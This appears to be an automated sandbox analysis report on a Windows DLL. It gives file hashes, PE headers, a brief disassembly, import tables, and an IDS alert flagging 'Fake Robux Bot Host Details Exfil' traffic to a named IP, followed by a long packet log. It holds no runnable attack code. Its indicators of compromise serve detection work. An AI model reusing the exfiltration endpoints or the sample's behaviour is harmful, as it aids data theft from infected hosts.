                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):5.969417936857653
                                                            TrID:
                                                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                            • Win64 Executable (generic) (12005/4) 10.17%
                                                            • Generic Win/DOS Executable (2004/3) 1.70%
                                                            • DOS Executable Generic (2002/1) 1.70%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                            File name:HQsitBLlOv.dll
                                                            File size:112'128 bytes
                                                            MD5:285e7d2f11c30f89d10887eef102cd74
                                                            SHA1:ce53d9b363bfc3baff51b690f37be27853053fcc
                                                            SHA256:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4
                                                            SHA512:5ea13adb2164f744b0140235ce62b8b9ecd8dbdd36625ad221add16415f3ca37a6d99b30a21e97d7f232345b7dcc1a05781bdfb196303ed7817caada08d3d032
                                                            SSDEEP:3072:mtJPYfAUwG1bIaNgByg1jCgH4F1WsBeMulwl:aYfAtG1bIaOQsm24bWrwl
                                                            TLSH:4EB35A4B62A504FBF1368378C8A34E45E7B6B8150760AF6F07A4435A1F63BD18D3EB61
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'LY.c-7.c-7.c-7.(U4.f-7.(U2..-7.(U3.i-7.c-7.b-7...2.F-7...3.m-7...4.r-7.(U6.`-7.c-6.9-7...>.a-7...7.b-7.....b-7...5.b-7.Richc-7
                                                            Icon Hash:7ae282899bbab082
                                                            Entrypoint:0x1800013fc
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x180000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x66DE3776 [Sun Sep 8 23:47:02 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:3b33a0fd02e658d9e1cdca7d0fcc3364
                                                            Instruction
                                                            dec eax
                                                            mov dword ptr [esp+08h], ebx
                                                            dec eax
                                                            mov dword ptr [esp+10h], esi
                                                            push edi
                                                            dec eax
                                                            sub esp, 20h
                                                            dec ecx
                                                            mov edi, eax
                                                            mov ebx, edx
                                                            dec eax
                                                            mov esi, ecx
                                                            cmp edx, 01h
                                                            jne 00007F2BA4DBA2D7h
                                                            call 00007F2BA4DBA5D4h
                                                            dec esp
                                                            mov eax, edi
                                                            mov edx, ebx
                                                            dec eax
                                                            mov ecx, esi
                                                            dec eax
                                                            mov ebx, dword ptr [esp+30h]
                                                            dec eax
                                                            mov esi, dword ptr [esp+38h]
                                                            dec eax
                                                            add esp, 20h
                                                            pop edi
                                                            jmp 00007F2BA4DBA164h
                                                            int3
                                                            int3
                                                            int3
                                                            inc eax
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            dec eax
                                                            mov ebx, ecx
                                                            xor ecx, ecx
                                                            call dword ptr [0000EBE3h]
                                                            dec eax
                                                            mov ecx, ebx
                                                            call dword ptr [0000EBD2h]
                                                            call dword ptr [0000EBDCh]
                                                            dec eax
                                                            mov ecx, eax
                                                            mov edx, C0000409h
                                                            dec eax
                                                            add esp, 20h
                                                            pop ebx
                                                            dec eax
                                                            jmp dword ptr [0000EBD0h]
                                                            dec eax
                                                            mov dword ptr [esp+08h], ecx
                                                            dec eax
                                                            sub esp, 38h
                                                            mov ecx, 00000017h
                                                            call dword ptr [0000EBC4h]
                                                            test eax, eax
                                                            je 00007F2BA4DBA2D9h
                                                            mov ecx, 00000002h
                                                            int 29h
                                                            dec eax
                                                            lea ecx, dword ptr [0001970Ah]
                                                            call 00007F2BA4DBA49Eh
                                                            dec eax
                                                            mov eax, dword ptr [esp+38h]
                                                            dec eax
                                                            mov dword ptr [000197F1h], eax
                                                            dec eax
                                                            lea eax, dword ptr [esp+38h]
                                                            dec eax
                                                            add eax, 08h
                                                            dec eax
                                                            mov dword ptr [00019781h], eax
                                                            dec eax
                                                            mov eax, dword ptr [000197DAh]
                                                            dec eax
                                                            mov dword ptr [0001964Bh], eax
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x193700x58.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x193c80x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000xf8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c0000x1050.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000x664.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x17a500x70.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x179100x140.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x100000x250.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000xeb000xec009fe23eb43cbcad6cabdf9eafbecd6cc8False0.5630958686440678data6.484254393647746IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x100000x9b880x9c00db85acf07b82096ef00fecb1558c0eccFalse0.4267077323717949data4.699122498052755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x1a0000x1ca80xc00af46192a71fd8a69989b5851533731e7False0.14225260416666666data2.0418830550419096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .pdata0x1c0000x10500x1200f0cce2aebb958d7285860ee3522105aaFalse0.4320746527777778data4.53353806453801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            _RDATA0x1e0000x1f40x2004ab83cc1ce28301b416d0dd0254e20a6False0.5234375data3.7086617662342007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc0x1f0000xf80x200ca220b4e602307c00e829209b4722123False0.3359375data2.5249599901333757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x200000x6640x80037e12b9713770c777edb6bf775fef47aFalse0.4990234375data4.880231318845951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0x1f0600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
                                                            DLLImport
                                                            KERNEL32.dllWinExec, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle
                                                            NameOrdinalAddress
                                                            DllRegisterServer10x180001000
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-15T16:00:15.804529+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649832162.159.136.232443TCP
                                                            2024-10-15T16:00:25.665151+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649888162.159.136.232443TCP
                                                            2024-10-15T16:00:25.701967+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649890162.159.136.232443TCP
                                                            2024-10-15T16:00:25.715450+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649889162.159.136.232443TCP
                                                            2024-10-15T16:00:41.031749+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649971162.159.136.232443TCP
                                                            2024-10-15T16:00:48.382072+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.650012162.159.136.232443TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 15, 2024 15:59:57.462167025 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.462594032 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.463644028 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.467012882 CEST8049727104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:57.467089891 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.467413902 CEST8049728104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:57.467478991 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.468442917 CEST8049729104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:57.468525887 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.469630957 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.470742941 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.470959902 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:57.474400997 CEST8049727104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:57.475641012 CEST8049728104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:57.475775003 CEST8049729104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.095881939 CEST8049728104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.095921993 CEST8049728104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.096070051 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:58.097490072 CEST8049727104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.097503901 CEST8049727104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.097635031 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:58.098251104 CEST8049729104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.098274946 CEST8049729104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:58.098503113 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:58.117086887 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.117120028 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.117182016 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.131674051 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.131685019 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.131742954 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.132750988 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.132767916 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.134921074 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.134932995 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.136400938 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.136451006 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.136504889 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.143564939 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.143584013 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.763081074 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.763154984 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.766522884 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.766613960 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.789027929 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.789047956 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.789949894 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.794980049 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.795053005 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.795986891 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.799068928 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.812472105 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.843410969 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.859410048 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.939058065 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.939275980 CEST44349733104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.939321995 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:58.959649086 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.959851027 CEST44349735104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:58.959911108 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.106091022 CEST49735443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.108635902 CEST49733443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.146372080 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.147002935 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.152956963 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.153023958 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.153279066 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.153287888 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.153341055 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.153501987 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.159796000 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.159815073 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.273785114 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.273861885 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.277044058 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.277051926 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.277317047 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.284882069 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.302254915 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:59.307244062 CEST8049746104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:59.307318926 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:59.308444977 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:59.313397884 CEST8049746104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:59.331406116 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.431889057 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.432121038 CEST44349734104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.432176113 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.448352098 CEST49734443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.456382990 CEST4974780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.461345911 CEST8049747185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.461494923 CEST4974780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.461673021 CEST4974780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.466567039 CEST8049747185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900305986 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900347948 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900379896 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900425911 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900469065 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.900476933 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.900515079 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900542021 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.900553942 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.900588036 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.900660038 CEST4974280192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.900661945 CEST4974380192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.902714968 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.902755976 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.902837038 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.902950048 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.902983904 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.903048992 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.903165102 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.903183937 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.903289080 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 15:59:59.903306007 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.905865908 CEST8049742185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.905896902 CEST8049743185.199.109.133192.168.2.6
                                                            Oct 15, 2024 15:59:59.934580088 CEST8049746104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:59.934639931 CEST8049746104.17.112.233192.168.2.6
                                                            Oct 15, 2024 15:59:59.934813023 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 15:59:59.937520027 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.937566996 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 15:59:59.937647104 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.940113068 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 15:59:59.940133095 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.057195902 CEST8049747185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.057518959 CEST4974780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.058398962 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.058422089 CEST8049747185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.058440924 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.058485985 CEST4974780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.058512926 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.058793068 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.058809996 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.062462091 CEST8049747185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.519571066 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.519654989 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.521919966 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.521934986 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.522187948 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.523093939 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.523159981 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.523180962 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.525026083 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.525036097 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.525284052 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.526242971 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.561738014 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.561809063 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 16:00:00.563209057 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 16:00:00.563220024 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.563733101 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.567414999 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.569542885 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 16:00:00.571400881 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.615407944 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.648597956 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.648817062 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.648885012 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.648914099 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.649015903 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.649086952 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.649096012 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.649163961 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.649286032 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.649300098 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653258085 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653378010 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653403044 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653445005 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.653456926 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653621912 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.653702974 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653748035 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.653788090 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.653798103 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.656744003 CEST44349748185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.656804085 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.661251068 CEST44349749185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.661298990 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.672076941 CEST44349751185.199.109.133192.168.2.6
